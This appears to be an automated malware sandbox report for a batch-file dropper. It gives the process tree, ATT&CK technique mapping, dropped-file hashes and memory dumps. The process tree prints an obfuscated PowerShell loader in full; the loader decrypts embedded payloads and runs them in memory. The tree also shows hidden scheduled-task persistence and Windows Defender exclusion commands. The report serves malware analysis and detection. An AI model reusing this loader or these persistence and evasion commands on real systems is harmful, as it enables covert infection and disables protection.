c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1828

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1852

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1692

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2096

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2252

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2508

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2516

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2524

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2668

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2704

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2716

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2780

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2796

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3068

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\boot.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vyfdhzkOhzuWPMpvreY3vZeyScn6WHRZY2R7Zkbkj4Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DAJ/xPMYanv7GkLC2SESzQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ONxiA=New-Object System.IO.MemoryStream(,$param_var); $QiWju=New-Object System.IO.MemoryStream; $Ezkrm=New-Object System.IO.Compression.GZipStream($ONxiA, [IO.Compression.CompressionMode]::Decompress); $Ezkrm.CopyTo($QiWju); $Ezkrm.Dispose(); $ONxiA.Dispose(); $QiWju.Dispose(); $QiWju.ToArray();}function execute_function($param_var,$param2_var){ $lSZJJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YnjRv=$lSZJJ.EntryPoint; $YnjRv.Invoke($null, $param2_var);}$jEnct = 'C:\Users\Admin\AppData\Local\Temp\boot.bat';$host.UI.RawUI.WindowTitle = $jEnct;$VPrGj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jEnct).Split([Environment]::NewLine);foreach ($WvbhA in $VPrGj) { if ($WvbhA.StartsWith('JIMqBrjcUshFgASmplvD')) { $BgeIS=$WvbhA.Substring(20); break; }}$payloads_var=[string[]]$BgeIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:3652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2120
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_817_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_817.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4836
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_817.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4404
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_817.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2260
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vyfdhzkOhzuWPMpvreY3vZeyScn6WHRZY2R7Zkbkj4Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DAJ/xPMYanv7GkLC2SESzQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ONxiA=New-Object System.IO.MemoryStream(,$param_var); $QiWju=New-Object System.IO.MemoryStream; $Ezkrm=New-Object System.IO.Compression.GZipStream($ONxiA, [IO.Compression.CompressionMode]::Decompress); $Ezkrm.CopyTo($QiWju); $Ezkrm.Dispose(); $ONxiA.Dispose(); $QiWju.Dispose(); $QiWju.ToArray();}function execute_function($param_var,$param2_var){ $lSZJJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YnjRv=$lSZJJ.EntryPoint; $YnjRv.Invoke($null, $param2_var);}$jEnct = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_817.bat';$host.UI.RawUI.WindowTitle = $jEnct;$VPrGj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jEnct).Split([Environment]::NewLine);foreach ($WvbhA in $VPrGj) { if ($WvbhA.StartsWith('JIMqBrjcUshFgASmplvD')) { $BgeIS=$WvbhA.Substring(20); break; }}$payloads_var=[string[]]$BgeIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:3124
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\system.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3164
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system" /tr "C:\Users\Admin\system.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2272
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /7
  2⤵
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1776

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4668

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3536

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:3656

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

Filesize
14KB

MD5
bb20cb1556c775de99855d1726131d32

SHA1
e2d45f6fd0ac317b77e07320d85d1ff67d950ce9

SHA256
1804284580292dc1980c54c889975bcf7c2dc20114441328555fe649434a2f51

SHA512
dfb41def178e9dd471d073380d74a465a926b494a5cc78154e8788f8f393d83a6234028e16476f67642a59c0b8e9c158b2230beb2b7e0601cd25a5d6b193022b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
50KB

MD5
2143b379fed61ab5450bab1a751798ce

SHA1
32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e

SHA256
a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81

SHA512
0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
aeb24b5729d62e81a27174f46d431126

SHA1
baa02ac3f99822d1915bac666450dc20727494bb

SHA256
d2b2e09bffd835255b1fb57c2aa92e5c28c080eb033e1f042087d36a93393471

SHA512
e62f6771339326a90f03b79f8a3321c4f00d66e5f228055f17b75d028895f80ce374bd0143ec971f55efa861b949ec672bfda9df7fb45444b17f3dbe479a5415

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
455d057f92f0a24fbb3eaa353348b21d

SHA1
5ac4cbbb7ee7253499aff9ad0a9718d90a7eb556

SHA256
adac36b99856a8b1f2f388f40b5c8a018f3b7527db2cff44ab0c47c1314b887e

SHA512
c809e22017cc79f5a6900082cf9c5320e043745c0c394516622d8a871a37d40402422d6a56900c86799efacd2ebdae67f875fb037debae9fc0d2241ac176cdc6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ec64170d23555926149057d65e0f0ac1

SHA1
36e3c0735e828e0fd5f4f286a2caba78883d007e

SHA256
e26837a5e9eb42046a224dbe6a4766027c976f622c60eee4f2903f488a11fa8b

SHA512
2e8c18f1ebb7056e97353665d526173666165502ace623f8837652ec03e72a083e8c2ef569f03144d7f9a3b4b37ea677061033b0565750cd0dcee35097ba57c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a368b34d65268d2ecadfb4d1cca53fc5

SHA1
afaa1ab196f9368082d6a5b3789b59430280a338

SHA256
2808cf2cf7cbb5324d8c9a7a8949dc2a6ef2ba010a3b1f7beda03a4d2c1eb1c4

SHA512
cd67c6e183d511b5baa4fcadf187508dd8c317c3eb6018703b0e48672276ace3a2a5c177b14f8dcce1b28156f9c5d57885e8885f160514da1f6bf6d3b8d4ee20

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c26bf9a1bce016297f47c64b2b294aa4

SHA1
6ab4fcb96018bcecd713ddd5bc3deae44f38c46b

SHA256
e36a536fd90d93fb2650574be47c8c60042c12d791553af61b1732f55e117c49

SHA512
92dbb296531fb51362a9697ed15e7596f549866692cfbef2b60df25dbad5ac7a2a8d90151e35577a6f8d3f853f53f446c49276cd29a802cc2df097bba1ba3dd1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vflx2gxy.waq.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_817.bat

Filesize
410KB

MD5
d87efb4cf8da07e1956944f23313bb5b

SHA1
929203873eaf41e02377a26e1ef4db8a88d37696

SHA256
f3d0b86b5b93ff36ccb01f326eae7b612a3016c6d570478de2211d01d2e39cbd

SHA512
d726064d2833f4ee4a52dc85515f6dd471e72acd53d2576916313a0aaa224e199ba56cdf6fbd5fe4b21be62ab38779adc1b977b333971f160ac8cf3e26ba952a

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_817.vbs

Filesize
124B

MD5
9d187f0669031fd0a826b230d9d2bebc

SHA1
a7036cbb3e82da6d24810b29518692f52eaee8e3

SHA256
63107f79de333a560c6ce13dde633913218a6299dffec9379d8e56422153c20c

SHA512
ba9d5f97fcb80a811eebdcd64f719531043b3b9f34d702f2dcd6a75b3f57641a2e3b9054f275254bf55ea01195cb856588370f15f4fe5dfcb8af7c39591866c2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk

Filesize
775B

MD5
e6024a4be42b00c737de2bfa8cf13ed2

SHA1
2849b08a0f3c0f32587b656dbd957df94fbe18ff

SHA256
ac6ab0d634f5c2e790ee08da365427b29d6b2ac320ff9702e0a8765d35a62f6e

SHA512
b15a4e7e29382fba069e8eb662b63b74be96adba5d6ba283af5839343e53a0a869a92cab4a9e55c635754281c085909687e2e6a989eb500fdc8330f4fea29f48

Download Submit
C:\Users\Admin\system.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
memory/376-219-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/616-236-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/720-230-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/908-233-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/984-227-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/1060-168-0x000001ACF5590000-0x000001ACF55AA000-memory.dmp

Filesize
104KB

Download
memory/1096-220-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/1244-221-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/1400-237-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/1500-232-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/1556-229-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/1756-228-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/1764-226-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/1852-235-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/2096-231-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/2120-47-0x0000022BB5FD0000-0x0000022BB6046000-memory.dmp

Filesize
472KB

Download
memory/2120-5-0x0000022BB5920000-0x0000022BB5942000-memory.dmp

Filesize
136KB

Download
memory/2120-6-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

Filesize
9.9MB

Download
memory/2120-244-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

Filesize
9.9MB

Download
memory/2120-7-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

Filesize
9.9MB

Download
memory/2120-36-0x0000022BB5CF0000-0x0000022BB5D2C000-memory.dmp

Filesize
240KB

Download
memory/2120-0-0x00007FFE19733000-0x00007FFE19734000-memory.dmp

Filesize
4KB

Download
memory/2120-58-0x0000022BB6050000-0x0000022BB60A0000-memory.dmp

Filesize
320KB

Download
memory/2120-56-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

Filesize
9.9MB

Download
memory/2120-57-0x0000022BB5990000-0x0000022BB5998000-memory.dmp

Filesize
32KB

Download
memory/2716-222-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/2780-225-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/2796-223-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/3352-217-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/3352-171-0x0000000002F10000-0x0000000002F3A000-memory.dmp

Filesize
168KB

Download
memory/3536-218-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/4668-224-0x00007FFDF63A0000-0x00007FFDF63B0000-memory.dmp

Filesize
64KB

Download
memory/4836-70-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

Filesize
9.9MB

Download
memory/4836-73-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

Filesize
9.9MB

Download
memory/4836-74-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

Filesize
9.9MB

Download
memory/4836-103-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

Filesize
9.9MB

Download